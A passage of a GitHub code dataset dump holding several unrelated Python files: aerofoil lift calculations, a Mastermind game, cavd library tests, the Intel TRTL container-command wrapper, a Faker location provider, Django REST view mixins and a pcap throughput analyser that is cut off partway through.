potential = MakePotential(gamma, circleRadius, u, circleOrigin)\n Zs, data = PotentialData(potential)\n #wing\n transformedZ= transformation(Zs)\n diffxt = np.diff(data, axis=1) / np.diff(transformedZ, axis=1)\n wingpress = rho / 2 * (u**2 - np.absolute(diffxt)**2)\n print(f\"{len(wingpress.flatten())} vs {len(transformedZ[:,:-1].flatten())}\")\n wingtree = sp.KDTree(np.array([(z.real, z.imag)\n for z in transformedZ[:,:-1].flatten()]))\n werrors, wpoints = wingtree.query(\n np.array([(x.real, x.imag) for x in wing]),\n distance_upper_bound=0.1,\n workers=-1)\n winglift = 1j * rho / 2 * sum([\n wingpress.flatten()[i]**2 *\n (transformedZ[:,:-1].flatten()[i + 1] - transformedZ[:,:-1].flatten()[i - 1]) / 2\n for i in wpoints\n ])\n print(winglift)\n plt.scatter(transformedZ[:,:-1].flatten()[wpoints].real,\n transformedZ[:,:-1].flatten()[wpoints].imag)\n plt.show()\n plt.plot(wingpress.flatten()[wpoints])\n plt.show()\n #circle\n diffx = np.diff(data, axis=1) / np.diff(Zs, axis=1)\n cylinderpress = rho / 2 * (u**2 - np.absolute(diffx)**2)\n circletree = sp.KDTree(np.array([(z.real, z.imag)\n for z in Zs[:,:-1].flatten()]))\n cerrors, cpoints = circletree.query(\n np.array([(x.real, x.imag) for x in circle]),\n distance_upper_bound=0.1,\n workers=-1)\n circlelift = 1j * rho / 2 * sum([\n cylinderpress.flatten()[i]**2 *\n (Zs[:,:-1].flatten()[i + 1] - Zs[:,:-1].flatten()[i - 1]) / 2\n for i in cpoints\n ])\n print(circlelift)\n plt.plot(Zs[:,:-1].flatten()[cpoints].real,\n Zs[:,:-1].flatten()[cpoints].imag)\n plt.show()\n plt.plot(cylinderpress.flatten()[cpoints])\n plt.show()\n\n","repo_name":"itepastra/stroming-projecten","sub_path":"Project 2/g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11343386252","text":"from string import ascii_uppercase\nfrom random import choice\n\ndef gen_colors(code_size: int) -> str:\n return ascii_uppercase[:code_size]\n\ndef gen_code(code_size: int, colors: str) -> str:\n return \"\".join([choice(colors) for i in range(code_size)])\n\ndef check_guess(guess, code_size, colors) -> bool:\n return len(guess) == code_size and not set(guess) - set(colors)\n\ndef score_guess(code, guess):\n all_good = 0\n color_good = 0\n left_in_code = []\n left_in_guess = []\n for i in range(len(code)):\n if code[i] == guess[i]:\n all_good += 1\n else:\n left_in_code += [code[i]]\n left_in_guess += [guess[i]]\n for i in left_in_guess:\n if i in left_in_code:\n color_good += 1\n left_in_code.remove(i)\n return (all_good, color_good)\n\ndef play_cli(code_size, nb_colors):\n colors = gen_colors(nb_colors)\n code = gen_code(code_size, colors)\n attempt = 0\n print(f\"Possible colors are {colors}\")\n print(f\"Code is size 4\")\n while True:\n guess = input(f\"{attempt} -->\")\n\n if not check_guess(guess, code_size, colors):\n print(\"Wrong size or color !\")\n continue\n\n attempt += 1\n all_good, color_good = score_guess(guess, code)\n \n if all_good == code_size:\n break\n\n print(f\"({all_good}, {color_good})\")\n print(f\"Congrats, you won after {attempt} attempts !\")\n\n\nif __name__ == \"__main__\":\n play_cli(4,6)\n# code_size = 4\n# colors = gen_colors(6)\n# print(gen_code(code_size, colors))\n#\n# assert(check_guess(\"AFDE\", code_size, colors))\n# assert(not check_guess(\"AFDED\", code_size, colors))\n# assert(not check_guess(\"AFDG\", code_size, colors))\n#\n# print(score_guess(\"ABCD\", \"ABCD\"))\n# print(score_guess('AAAA', 'ABCD'))\n# print(score_guess('AADA', 'ABCD'))\n# print(score_guess('ADDA', 'ABCD'))\n# print(score_guess('ADDB', 'ABCD'))","repo_name":"axellink/my-hackinscience-solutions","sub_path":"solutions/66-py-master-mind.py","file_name":"66-py-master-mind.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33960744923","text":"import cavd\nradii = cavd.EffectiveRadCom(\"./icsd_16713.cif\")\nprint(radii)\n\ncavd.BIComputation(filename=\"./icsd_16713.cif\",migrant=\"Li\",rad_flag=True,effective_rad=True,rad_file=None,rad_store_in_vasp=True,minRad=0.2,maxRad=0.8)\ncavd.BIComputation(filename=\"./Li2CO3-LDA.cif\",migrant=\"Li\",rad_flag=False,effective_rad=True,rad_file=None,rad_store_in_vasp=True,minRad=0.2,maxRad=0.8)\n\nRi,Rf,Rif = cavd.ConnValCom(\"./icsd_16713.cif\",\"Li\",True,True,None)\nprint(Ri,Rf,Rif)\nRi1,Rf1,Rif1 = cavd.ConnValCom(\"./Li2CO3-LDA.cif\",\"Li\",False,True,None)\nprint(Ri1,Rf1,Rif1)\n\nconn = cavd.ConnValListCom(\"./icsd_16713.cif\",\"Li\",True,True,None)\nconn1 = cavd.ConnValListCom(\"./Li2CO3-LDA.cif\",\"Li\",False,True,None)\nprint(conn)\nprint(conn1)\n\noneD,twoD,threeD = cavd.ConnStatusCom(\"./icsd_16713.cif\",0.4,\"Li\",True,True,None)\noneD1,twoD1,threeD1 = cavd.ConnStatusCom(\"./Li2CO3-LDA.cif\",0.4,\"Li\",False,True,None)\nprint(oneD,twoD,threeD)\nprint(oneD1,twoD1,threeD1)\n\noneD2,twoD2,threeD2 = cavd.ConnStatus(0.4,conn)\noneD3,twoD3,threeD3 = cavd.ConnStatus(0.4,conn1)\nprint(oneD2,twoD2,threeD2)\nprint(oneD3,twoD3,threeD3)\n\ncavd.ChannelCom(\"./icsd_16713.cif\",0.2,\"Li\",True,True,None)\ncavd.ChannelCom(\"./Li2CO3-LDA.cif\",0.2,\"Li\",False,True,None)\n\ncavd.ASACom(\"./icsd_16713.cif\",0.5,1000,\"Li\",True,True,None)\ncavd.ASACom(\"./Li2CO3-LDA.cif\",0.5,1000,\"Li\",False,True,None)\n\ncavd.VoidNetCom(\"./icsd_16713.cif\",\"Li\",True,True,None)\ncavd.VoidNetCom(\"./icsd_16713.cif\",\"Li\",False,True,None)\n#cavd.AllCom(\"./icsd_16713.cif\",0.5,1000,\"Li\",True,True,None,True,0.584,0.876)","repo_name":"shuhebing/cavd","sub_path":"examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"16966629501","text":"# Decimal to binary\n\ndef binary(n) :\n if not n : return 0\n elif n >= 1 : \n binary(n // 2)\n print(n % 2, end = '')\n\nn = int(input(\"Enter a decimal number: \"))\nprint(\"Binary number:\")\nbinary(n)","repo_name":"mre9798/Python_Anlin","sub_path":"Sample Work/Recursive Decimal to Bin.py","file_name":"Recursive Decimal to Bin.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12184188792","text":"from typing import Optional, Tuple\n\nimport logging\nimport pipes\n\nfrom .constants import DOCKER, COMPOSE, TRTL_PATH\nfrom subprocess import Popen, PIPE\nimport shlex\nimport time\n\nfrom inbm_common_lib.shell_runner import PseudoShellRunner\n\nlogger = logging.getLogger(__name__)\n\n\nclass Trtl:\n \"\"\"\n Class for creating/running TRTL shell commands using a boilerplate\n @param runner: PseudoShellRunner object\n @param app_type: application type TRTL should use to execute the command\n @param config_params: configuration values necessary for the command to execute\n \"\"\"\n\n def __init__(self, runner: PseudoShellRunner, app_type: Optional[str] = None, config_params: Optional[str] = None) -> None:\n self.runner = runner\n if app_type is not None:\n self.__app_type = app_type\n else:\n self.__app_type = DOCKER\n\n if config_params is not None:\n self.params = config_params\n else:\n self.params = \"\"\n\n def _boilerplate(self, command: str, **kwargs: str) -> str:\n \"\"\"Construct command template for TRTL\n @param command: TRTL command\n @return: String representing TRTL command\n \"\"\"\n txt = ''\n for k, v in kwargs.items():\n txt += ' -' + k + \"=\" + v\n\n return TRTL_PATH + \" -type=\" + self.__app_type + \" -cmd=\" + command + txt\n\n def stats(self) -> Optional[str]:\n \"\"\"Do stats\n\n @return: code and container usage statistics\n \"\"\"\n logger.debug(\"Trtl.stats()\")\n (output, err, usage) = self.runner.run(self._boilerplate(\"stats\"))\n for line in output.splitlines():\n if \"ContainerStats=\" in line:\n logger.debug(line)\n return line.split('=')[1]\n return err\n\n def image_import(self, url: str, image_name: str) -> Tuple[str, Optional[str], int]:\n \"\"\"Do import\n\n @param url: URL location of the image TAR file\n @param image_name: Name and tag to use for image. 'sample-container:2'\n @return: exec_code, is_error, output of trtl command\n \"\"\"\n logging.debug(\"Trtl.import(\" + image_name + \", \" + url + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"import\") + \" -ref=\" + image_name + \" -src=\" + url)\n logging.debug(\n \"Trtl.import results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n return out, err, code\n\n def image_load(self, path: str, image_name: str) -> Tuple[str, Optional[str], int]:\n \"\"\"Do load\n\n @param path: Location of the image tar file\n @param image_name: Name to use for image.\n @return: code, err and version number of image just loaded\n \"\"\"\n logging.debug(\"Trtl.load(\" + path + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"load\") + \" -src=\" + path + \" -ref=\" + image_name)\n logging.debug(\n \"Trtl.load results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n return out, err, code\n\n def snapshot(self, image: str) -> Tuple[str, Optional[str], int]:\n \"\"\"Do snapshot\n\n @param image: Image whose snapshot is to be taken\n @return: output, optional std error, return code\n \"\"\"\n logger.debug(\"Trtl.snapshot(\" + str(image) + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"snapshot\") + \" -in=\" + image + \" -am=true\")\n logging.debug(\"Trtl.snapshot results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return out, err, code\n\n def get_image_by_container_id(self, container_id: str) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL GetImageByContainerID\n\n @param container_id: Container ID\n @return: image id associated with container id\n \"\"\"\n logger.debug(\"Trtl.getimagebycontainerid(\" + str(container_id) + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"getimagebycontainerid\") + \" -id=\" + str(container_id))\n logging.debug(\n \"Trtl.getimagebycontainerid results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return out, err, code\n\n def execute(self, image: str, version: int, opt: bool = False) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL execute\n\n @param image: Image whose snapshot is to be taken\n @param version: Container tag version\n @param opt: flag which specifies if config params need to be passed or not\n @return: Result, error message, error code\n \"\"\"\n command = \"\"\n if opt:\n logger.debug(\"(1/2) Trtl.execute(\" + str(image) + \", \" +\n str(version) + \", ['\" + str(self.params) + \"'])\")\n (out, err, code) = self.runner.run(self._boilerplate(\"exec\") +\n \" -in=\" + image + \" -iv=\" + str(version) +\n \" -opt=['\" + self.params + \"']\")\n if err is None:\n err = \"\"\n logger.debug(\"(2/2) Stdout: [\" + out + \"]\" + \"; stderr: [\" + err +\n \"]; return code: \" + str(code))\n else:\n logger.debug(\"(1/2) Trtl.execute(\" + str(image) +\n \", \" + str(version) + \", [\" + str(command) + \"])\")\n (out, err, code) = self.runner.run(self._boilerplate(\"exec\") +\n \" -in=\" + image + \" -iv=\" + str(version) +\n \" -ec=\" + pipes.quote(command))\n if err is None:\n err = \"\"\n logger.debug(\"(2/2) Stdout: [\" + out + \"]\" + \"; stderr: [\" + err +\n \"]; return code: \" + str(code))\n return out, err, code\n\n def image_pull_public(self, image: str, reference: Optional[str], file_name: Optional[str] = None) \\\n -> Tuple[str, Optional[str], int]:\n \"\"\"Do image pull to public registry\n\n @param image: image name\n @param reference: remote registry from which to pull image\n @param file_name: file name\n @return: code, err and version number of image pulled\n \"\"\"\n\n if image and reference:\n reference = reference + \"/\" + image\n elif reference is None:\n reference = image\n\n if self.__app_type == COMPOSE:\n reference = image\n logger.debug(\"Trtl.pull(\" + str(reference) + \")\")\n\n if file_name:\n out, err, code = self.runner.run(\n self._boilerplate(\"pull\") + \" -cf=\" + file_name + \" -ref=\" + reference)\n else:\n out, err, code = self.runner.run(\n self._boilerplate(\"pull\") + \" -ref=\" + reference)\n else:\n logger.debug(\"Trtl.imagepull(\" + str(reference) + \")\")\n out, err, code = self.runner.run(\n self._boilerplate(\"imagepull\") + \" -ref=\" + reference)\n\n logging.debug(\"pull results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return out, err, code\n\n @staticmethod\n def _send_password(cmd: str, password: str) -> Tuple[str, Optional[str], int]:\n\n p = Popen(shlex.split(str(cmd)), stdout=PIPE, stdin=PIPE, stderr=PIPE)\n pwd = bytes(password + '\\n', 'utf-8')\n (out, err) = p.communicate(input=pwd)\n str_out = out.decode(encoding='utf-8', errors='strict')\n str_err = err.decode(encoding='utf-8', errors='strict')\n logger.debug(f\"output: {out!s} error: {err!s}\")\n\n while p.poll() is None:\n time.sleep(0.5)\n\n logger.debug(f\"(2/2) Sending password to TRTL. err={err!s}\")\n return str_out, str_err, p.returncode\n\n def image_pull_private(self, image: str, reference: str, username: str, password: str) -> Tuple[str, Optional[str], int]:\n \"\"\"Do image pull to private registry\n\n @param image: image tag\n @param reference: remote registry from which to pull image\n @param username: username to login to private registry\n @param password: password to login to private registry\n @return: code, err and version number of image pulled\n \"\"\"\n\n if image and reference:\n reference = reference + \"/\" + image\n elif reference is None:\n reference = image\n\n logger.debug(\n \"(1/2) Trtl.imagepull(\" +\n str(reference) +\n \", \" +\n str(username) +\n \")\")\n\n cmd = (\n self._boilerplate(\"imagepull\") +\n \" -ref=\" +\n str(reference) +\n \" -user=\" +\n str(username))\n\n return Trtl._send_password(cmd, password)\n\n def login(self, private_registry: str, username: str, password: str) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL login\n\n @param private_registry: The private docker registry\n @param username: username to login to the docker private registry\n @param password: password to login to docker private registry\n @return: Result, error message, error code\n \"\"\"\n\n logger.debug(\n \"(1/2) Trtl.login(\" +\n str(private_registry) +\n \", \" +\n str(username) +\n \")\")\n\n cmd = (self._boilerplate(\"login\") + \" -user=\" + str(username)\n + \" -svr=\" + str(private_registry))\n\n return Trtl._send_password(cmd, password)\n\n def up(self, image: str, file_name: Optional[str] = None) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL up (docker-compose)\n\n @param image: Image to be created/started/attached\n @param file_name: Custom YML file to load on compose\n @return: Result, error message, error code\n \"\"\"\n\n logger.debug(\"Running Trtl.up\")\n if file_name is None:\n (out, err, code) = self.runner.run(self._boilerplate(\n \"up\") + \" -in=\" + image)\n else:\n (out, err, code) = self.runner.run(self._boilerplate(\n \"up\") + \" -in=\" + image + \" -cf=\" + file_name)\n return out, err, code\n\n def down(self, image: str, file_name: Optional[str] = None) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL down (docker-compose)\n\n @param image: Image to be stopped\n @param file_name: File name\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.down(\" + image + \")\")\n if file_name is None:\n out, err, code = self.runner.run(self._boilerplate(\"down\") + \" -in=\" + image)\n else:\n out, err, code = self.runner.run(self._boilerplate(\n \"down\") + \" -in=\" + image + \" -cf=\" + file_name)\n logging.debug(\n \"Trtl.down results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n return out, err, code\n\n def start(self, image: str, version: int, opt: bool = False) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL start\n\n @param image: Image to be started\n @param version: Image version\n @param opt: flag which specifies if config params need to be passed or not\n @return: Result, error message, error code\n \"\"\"\n\n if opt:\n logger.debug(\"(1/2) Trtl.start(\" + str(image) + \", \" + str(\n version) + \", ['\" + str(self.params) + \"'])\")\n (out, err, code) = self.runner.run(self._boilerplate(\"start\") +\n \" -in=\" + image + \" -iv=\" + str(version) +\n \" -opt=['\" + self.params + \"']\")\n if err is None:\n err = \"\"\n logger.debug(\"(2/2) Stdout: [\" + out + \"]\" + \"; stderr: [\" + err +\n \"]; return code: \" + str(code))\n else:\n logger.debug(\"(1/2) Trtl.start(\" + str(image) + \", \" + str(\n version))\n (out, err, code) = self.runner.run(self._boilerplate(\n \"start\") + \" -in=\" + image + \" -iv=\" + str(version))\n if err is None:\n err = \"\"\n logger.debug(\"(2/2) Stdout: [\" + out + \"]\" + \"; stderr: [\" + err +\n \"]; return code: \" + str(code))\n return out, err, code\n\n def rollback(self, in_image: str, in_version: int, out_image: str, out_version: int) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL rollback\n\n @param in_image: Rollback from image\n @param in_version: Rollback from image version\n @param out_image: Rollback to image\n @param out_version: Rollback to image version\n\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.rollback(\" + in_image + \", \" + str(in_version) +\n \", \" + out_image + \", \" + str(out_version) + \")\")\n out, err, code = self.runner.run(self._boilerplate(\"rollback\") +\n \" -in=\" + in_image + \" -iv=\" + str(in_version) +\n \" -sn=\" + out_image + \" -sv=\" +\n str(out_version))\n logging.debug(\"Trtl.rollback results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return out, err, code\n\n def commit(self, image: str, version: int) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL commit\n\n @param image: Image to be committed\n @param version: Image version\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.commit(\" + image + \", \" + str(version) + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"commit\") + \" -in=\" + image + \" -iv=\" + str(version))\n logging.debug(\"Trtl.commit results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return out, err, code\n\n def stop(self, image: str, version: int = -1) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL stop\n\n @param image: Image to be stopped\n @param version: Image version; -1 means no version, 0 means latest\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.stop(\" + image + \", \" + str(version) + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"stop\") + \" -in=\" + image + \" -iv=\" + str(version))\n logging.debug(\n \"Trtl.stop results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n return out, err, code\n\n def stop_by_id(self, container_id: str) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL stopByID\n @param container_id: ContainerID to be stopped\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.stopByID(\" + container_id + \")\")\n out, err, code = self.runner.run(\n self._boilerplate(\"stopByID\") + \" -id=\" + container_id)\n logging.debug(\"Trtl.stop_by_id results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return out, err, code\n\n def stop_all(self, image: str) -> Tuple[str, Optional[str], int]:\n \"\"\"\n Do TRTL stopAll\n @param image: Container image to be stopped\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.StopAll(\" + image + \")\")\n out, err, code = self.runner.run(self._boilerplate(\"StopAll\") + \" -in=\" + image)\n logging.debug(\"Trtl.stopAll results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return out, err, code\n\n def image_remove_by_id(self, image_id: str, force: bool = False) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL imageRemoveByID\n @param image_id: ImageID to be removed\n @param force: Force image to be removed even if it has an active container\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.imageRemoveByID(\" + image_id + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"imageRemoveByID\") + \" -id=\" + image_id + \" -f=\" + str(force))\n logging.debug(\n \"Trtl.imageremovebyid results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n return out, err, code\n\n def get_latest_tag(self, image: str) -> Tuple[str, int]:\n \"\"\"Get Latest Tag used for an image.\n\n @param image: Image of which the latest tag should be found\n @return: Latest tag number being used\n \"\"\"\n logger.debug(\"Trtl.getlatesttag(\" + image + \")\")\n (out, err, code) = self.runner.run(self._boilerplate(\"getlatesttag\") +\n \" -in=\" + image)\n logging.debug(\n \"Trtl.getlatesttag results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n return out, code\n\n def remove_old_images(self, image: str) -> Optional[str]:\n \"\"\"Remove old images of the image name specified.\n This would look into config file for how many old images to keep\n for the image name specified and would remove any images older than the number specified.\n\n @param image: Image name of which the older versions should be deleted\n @return: error if any\n \"\"\"\n if self.__app_type == COMPOSE:\n logger.info(\n \"Removing old images not currently supported when using Compose.\")\n return None\n\n logger.debug(\"Trtl.removeoldimage(\" + image + \")\")\n (out, err, code) = self.runner.run(\n self._boilerplate(\"imagedeleteold\") + \" -in=\" + image)\n logging.debug(\n \"Trtl.removeoldimage results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n if code != 0 and err != '':\n return err\n else:\n return None\n\n def list(self, container_id: Optional[str] = None) -> Tuple[Optional[str], str]:\n \"\"\"Lists all the running containers\n\n @param container_id: Image name\n @return: error if any and the list\n \"\"\"\n if container_id is None:\n container_id = ''\n\n logger.debug(f\"Trtl.list: container_id->{container_id}\")\n out, err, code = self.runner.run(\n self._boilerplate(\"list\") + \" -in=\" + container_id)\n logging.debug(\n \"Trtl.list results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n if code != 0 and err != '':\n return err, ''\n else:\n return None, out\n\n def image_remove_all(self, image: str, force: bool = False) -> Tuple[str, Optional[str], int]:\n \"\"\"\n Do TRTL Remove All images (e.g. compose images)\n\n @param image: Image to be stopped\n @param force: Force image to be removed even if it has an active container\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.imageRemoveAll(\" + image + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"ImageRemoveAll\") + \" -in=\" + image + \" -f=\" + str(force))\n logging.debug(\n \"Trtl.imageRemoveAll results: output={}, err={}, exitcode={}\" .format(\n out, err, code))\n return out, err, code\n\n def remove_container(self, container_id: str, force: bool) -> Optional[str]:\n \"\"\"Removes container with the container_id specified\n\n @param container_id: Image name of which the older versions should be deleted\n @param force: Whether if should do force removal or not (e.g of a running container)\n @return: error if any\n \"\"\"\n logger.debug(\"Trtl.containerRemove(\" + container_id + \")\")\n if force:\n (out, err, code) = self.runner.run(self._boilerplate(\n \"containerRemoveByID\" + \" -f\") + \" -id=\" + container_id)\n else:\n (out, err, code) = self.runner.run(self._boilerplate(\n \"containerRemoveByID\") + \" -id=\" + container_id)\n\n logging.debug(\n \"Trtl.containerRemove results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n if code != 0 and err != '':\n return err\n else:\n return None\n\n def single_snapshot(self, desc: str) -> Tuple[str, Optional[str]]:\n \"\"\"Creates a snapper snapshot of type single on BTRFS fs with given description.\n @param desc: Description to use for snapshot\n\n @return: stdout and error if any\n \"\"\"\n logger.debug(\"Trtl.singlesnapshot()\")\n (out, err, code) = self.runner.run(\n self._boilerplate(\"singleSnapshot\", description=desc))\n logging.debug(\n \"Trtl.singlesnapshot results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n if code != 0:\n return out, err\n else:\n return out, ''\n\n def delete_snapshot(self, snapshot: str) -> Tuple[int, Optional[str]]:\n \"\"\"Trtl wrapper to delete a particular snapshot.\n\n @return: code and error if any\n \"\"\"\n logger.debug(\"Trtl.delete_snapshot()\")\n (out, err, code) = self.runner.run(\n self._boilerplate(\"deleteSnapshot\", iv=str(snapshot)))\n logging.debug(\n \"Trtl.delete_snapshot results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n return code, err\n\n def sota_rollback(self, snapshot: str) -> Tuple[int, Optional[str]]:\n \"\"\"Trtl wrapper to perform rollback to a given snapshot.\n\n @return: error if any\n \"\"\"\n logger.debug(\"Trtl.rollback()\")\n (out, err, code) = self.runner.run(\n self._boilerplate(\"UndoChange\", sv=str(snapshot)))\n logging.debug(\"Trtl.rollback results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return code, err\n\n def run_docker_bench_security_test(self) -> Optional[str]:\n \"\"\"Runs DBS script via TRTL\n @return: output from DBS script\n \"\"\"\n cmd = self._boilerplate(\"dockerbenchsecurity\")\n out, err, code = self.runner.run(cmd)\n\n if code == 0:\n logger.debug(\"Docker security bench executed\")\n return out\n else:\n if err is None:\n err = \"\"\n logger.debug(\"Could not run docker security bench : \" + err)\n\n return None\n","repo_name":"intel/intel-inb-manageability","sub_path":"inbm-lib/inbm_lib/trtl.py","file_name":"trtl.py","file_ext":"py","file_size_in_byte":22544,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"3"} +{"seq_id":"3918808871","text":"# coding=utf-8\n\nfrom faker import Faker\nimport math\n\n\n# 状态位Provider\nclass LocationProvider(object):\n def __init__(self, loc_type):\n \"\"\"\n 产生地理位置的provider\n :param type: 0表示latitude, 1表示longitude\n \"\"\"\n self.loc_type = loc_type\n self.fake = Faker()\n\n def random_status(self):\n if self.loc_type == 0:\n return int(math.fabs(self.fake.latitude() * 1000000))\n else:\n return int(math.fabs(self.fake.longitude() * 1000000))\n\n\nif __name__ == \"__main__\":\n sp = LocationProvider(1)\n print(sp.random_status())\n","repo_name":"gdchaochao/tsdb-data-generator","sub_path":"myfaker/provider/LocationProvider.py","file_name":"LocationProvider.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73722674320","text":"\"\"\"\nView classes to help facilitate the creation of REST APIs\n\"\"\"\nimport json\n\nfrom django.core.exceptions import PermissionDenied, ValidationError\nfrom django.http import HttpResponse, Http404\nfrom django.views.generic.base import View\nfrom django.conf import settings\n\nfrom argonauts import dumps\n\n\nclass JsonResponseMixin(object):\n \"\"\"\n Sets the response MIME type to ``application/json`` and serializes the\n context obj as a JSON string.\n \"\"\"\n def render_to_response(self, obj, **response_kwargs):\n \"\"\"\n Returns an ``HttpResponse`` object instance with Content-Type:\n application/json.\n\n The response body will be the return value of ``self.serialize(obj)``\n \"\"\"\n return HttpResponse(self.serialize(obj), content_type='application/json', **response_kwargs)\n\n def serialize(self, obj):\n \"\"\"\n Returns a json serialized string object encoded using\n `argonauts.serializers.JSONArgonautsEncoder`.\n \"\"\"\n return dumps(obj)\n\n def http_method_not_allowed(self, *args, **kwargs):\n \"\"\"\n Returns super after setting the Content-Type header to\n ``application/json``\n \"\"\"\n resp = super(JsonResponseMixin, self).http_method_not_allowed(*args, **kwargs)\n resp['Content-Type'] = 'application/json'\n\n return resp\n\n\nclass JsonRequestMixin(object):\n \"\"\"\n Adds a ``data`` method on the view instance. It returns the GET parameters\n if it is a GET request. It will return the python representation of the\n JSON sent with the request body.\n \"\"\"\n def data(self):\n \"\"\"\n Helper class for parsing JSON POST data into a Python object.\n \"\"\"\n if self.request.method == 'GET':\n return self.request.GET\n else:\n assert self.request.META['CONTENT_TYPE'].startswith('application/json')\n charset = self.request.encoding or settings.DEFAULT_CHARSET\n return json.loads(self.request.body.decode(charset))\n\n\nclass RestView(JsonResponseMixin, JsonRequestMixin, View):\n \"\"\"\n Inherit this base class to implement a REST view.\n\n This view will handle:\n - authentication (throuh the ``auth`` method)\n - dispatching to the proper HTTP method function\n - returning a proper error status code.\n\n It also implements a default response for the OPTIONS HTTP request method.\n \"\"\"\n def auth(self, *args, **kwargs):\n \"\"\"\n Hook for implementing custom authentication.\n\n Raises ``NotImplementedError`` by default. Subclasses must overwrite\n this.\n \"\"\"\n raise NotImplementedError(\"If you really want no authentication, override this method\")\n\n def dispatch(self, *args, **kwargs):\n \"\"\"\n Authenticates the request and dispatches to the correct HTTP method\n function (GET, POST, PUT,...).\n\n Translates exceptions into proper JSON serialized HTTP responses:\n - ValidationError: HTTP 409\n - Http404: HTTP 404\n - PermissionDenied: HTTP 403\n - ValueError: HTTP 400\n \"\"\"\n try:\n self.auth(*args, **kwargs)\n return super(RestView, self).dispatch(*args, **kwargs)\n except ValidationError as e:\n return self.render_to_response(e.message_dict, status=409)\n except Http404 as e:\n return self.render_to_response(str(e), status=404)\n except PermissionDenied as e:\n return self.render_to_response(str(e), status=403)\n except ValueError as e:\n return self.render_to_response(str(e), status=400)\n\n def options(self, request, *args, **kwargs):\n \"\"\"\n Implements a OPTIONS HTTP method function returning all allowed HTTP\n methods.\n \"\"\"\n allow = []\n for method in self.http_method_names:\n if hasattr(self, method):\n allow.append(method.upper())\n r = self.render_to_response(None)\n r['Allow'] = ','.join(allow)\n return r\n","repo_name":"fusionbox/django-argonauts","sub_path":"argonauts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"3"} +{"seq_id":"19103006050","text":"import sys\nimport scapy.all as scapy\n\nq_disc = sys.argv[2]\n\nprint(\"\")\nprint(f\"Reading {q_disc} packets....\")\nstart_time = 0\n\ndata_sent = [0] * 6\ntime = 0.2\n\nf = open(\"data.txt\", \"w+\")\n\nprint(\"Analayzing data....\")\nprint(\"Completed: 0%\", end=\"\\r\")\nwith scapy.PcapReader(f\"{sys.argv[1]}/r1_r2.pcap\") as pr:\n sum = 0\n for ind, i in enumerate(pr):\n if ind == 0:\n start_time = i.time\n ip = ''\n \n if i.type == 2048:\n ip = i['IP'].dst\n \n if i.time - start_time >= time:\n print(f\"Completed: {int(time/3)}%\", end=\"\\r\")\n for j in data_sent:\n sum += j\n sum *= 10\n sum = sum / 25000\n f.write(f\"{time}\\t{data_sent[0]/25000}\\t{data_sent[1]/25000}\\t{data_sent[2]/25000}\\t{data_sent[3]/25000}\\t{data_sent[4]/25000}\\t{data_sent[5]/25000}\\t{sum}\\n\")\n time += 0.2\n if time > 300:\n break\n data_sent = [0] * 6\n sum = 0\n\n if ip == '10.2.0.1':\n data_sent[0] += len(i)\n elif ip == '10.2.0.2':\n data_sent[1] += len(i)\n elif ip == '10.2.0.3':\n data_sent[2] += len(i)\n elif ip == 